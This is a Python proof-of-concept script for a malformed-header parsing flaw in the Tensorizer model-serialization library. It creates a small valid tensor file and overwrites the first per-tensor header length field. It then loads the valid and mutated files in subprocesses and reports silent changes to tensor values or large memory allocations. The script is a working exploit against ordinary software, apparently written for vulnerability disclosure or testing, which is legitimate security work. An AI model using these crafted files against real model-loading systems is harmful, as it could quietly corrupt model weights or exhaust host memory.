tensorizer-header-len-poc / repro_tensorizer_header_len.py
surrealgrain's picture
Add Tensorizer header length parser PoC
e355680 verified
#!/usr/bin/env python3
"""
Local-only validation for Tensorizer malformed-header parsing.
The script creates a valid tiny Tensorizer file, mutates the first per-tensor
header length field, and loads the mutated file in a subprocess. The default
mutation is non-destructive and demonstrates silent tensor-value manipulation
without requiring a large allocation. Larger bounded values can be supplied to
exercise the allocation behavior.
"""
from __future__ import annotations
import argparse
import os
import resource
import struct
import subprocess
import sys
from pathlib import Path
MAGIC_LEN = 5
FILE_HEADER_LEN = 4 + struct.calcsize("<32sQ8xQ")
METADATA_LEN_FIELD = 8
def make_valid_tensorizer(path: Path) -> None:
import torch
from tensorizer import TensorSerializer
path.parent.mkdir(parents=True, exist_ok=True)
serializer = TensorSerializer(path)
serializer.write_state_dict({"weight": torch.tensor([1.0], dtype=torch.float32)})
serializer.close()
def first_tensor_header_offset(blob: bytes) -> tuple[int, int, int]:
metadata_len_offset = MAGIC_LEN + FILE_HEADER_LEN
metadata_len = struct.unpack_from("<Q", blob, metadata_len_offset)[0]
header_offset = metadata_len_offset + METADATA_LEN_FIELD + metadata_len
header_len = struct.unpack_from("<Q", blob, header_offset)[0]
return metadata_len, header_offset, header_len
def mutate_header_len(valid_path: Path, mutated_path: Path, header_len: int) -> tuple[int, int, int]:
blob = bytearray(valid_path.read_bytes())
metadata_len, header_offset, original_header_len = first_tensor_header_offset(blob)
struct.pack_into("<Q", blob, header_offset, header_len)
mutated_path.write_bytes(blob)
return metadata_len, header_offset, original_header_len
def load_file(path: Path, memory_limit_mb: int | None, verify_hash: bool) -> int:
import psutil
import tensorizer
from tensorizer import TensorDeserializer
process = psutil.Process(os.getpid())
before_rss = process.memory_info().rss
before_peak = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss
if memory_limit_mb is not None:
limit = memory_limit_mb * 1024 * 1024
resource.setrlimit(resource.RLIMIT_AS, (limit, limit))
print(f"tensorizer_version={getattr(tensorizer, '__version__', 'unknown')}")
print(f"file_size={path.stat().st_size}")
print(f"rss_before={before_rss}")
print(f"peak_before={before_peak}")
try:
deserializer = TensorDeserializer(
path,
device="cpu",
lazy_load=False,
num_readers=1,
verify_hash=verify_hash,
)
keys = list(deserializer.keys())
print(f"loaded_keys={keys}")
if keys:
tensor = deserializer[keys[0]]
print(f"first_tensor_value={tensor.detach().cpu().numpy().tolist()}")
deserializer.close()
after_rss = process.memory_info().rss
after_peak = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss
print(f"rss_after={after_rss}")
print(f"peak_after={after_peak}")
return 0
except BaseException as exc:
after_rss = process.memory_info().rss
after_peak = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss
print(f"exception_type={type(exc).__name__}")
print(f"exception={exc}")
print(f"rss_after={after_rss}")
print(f"peak_after={after_peak}")
return 2
def main() -> int:
parser = argparse.ArgumentParser()
parser.add_argument(
"--out-dir",
default="reports/pocs/tensorizer_header_len",
type=Path,
)
parser.add_argument("--header-len", default=128, type=int)
parser.add_argument(
"--header-mb",
default=None,
type=int,
help="Optional mutated tensor header length in MiB.",
)
parser.add_argument(
"--memory-limit-mb",
default=None,
type=int,
help="Optional address-space limit applied inside the child after imports.",
)
parser.add_argument("--child-load", type=Path)
parser.add_argument("--verify-hash", action="store_true")
args = parser.parse_args()
if args.child_load is not None:
return load_file(args.child_load, args.memory_limit_mb, args.verify_hash)
valid_path = args.out_dir / "valid_minimal.tensors"
mutated_path = args.out_dir / "malformed_header_len.tensors"
requested_header_len = (
args.header_mb * 1024 * 1024
if args.header_mb is not None
else args.header_len
)
make_valid_tensorizer(valid_path)
metadata_len, header_offset, original_header_len = mutate_header_len(
valid_path,
mutated_path,
requested_header_len,
)
print(f"valid_path={valid_path}")
print(f"valid_size={valid_path.stat().st_size}")
print(f"mutated_path={mutated_path}")
print(f"mutated_size={mutated_path.stat().st_size}")
print(f"metadata_len={metadata_len}")
print(f"header_offset={header_offset}")
print(f"original_header_len={original_header_len}")
print(f"mutated_header_len={requested_header_len}")
for label, path, verify_hash in (
("valid", valid_path, False),
("mutated", mutated_path, False),
("mutated_verify_hash", mutated_path, True),
):
cmd = [sys.executable, __file__, "--child-load", str(path)]
if verify_hash:
cmd.append("--verify-hash")
if args.memory_limit_mb is not None:
cmd.extend(["--memory-limit-mb", str(args.memory_limit_mb)])
result = subprocess.run(cmd, text=True, capture_output=True, check=False)
print(f"--- {label} child stdout ---")
print(result.stdout, end="")
print(f"--- {label} child stderr ---")
print(result.stderr, end="")
print(f"{label}_child_exit_code={result.returncode}")
if result.returncode != 0:
return result.returncode
return 0
if __name__ == "__main__":
raise SystemExit(main())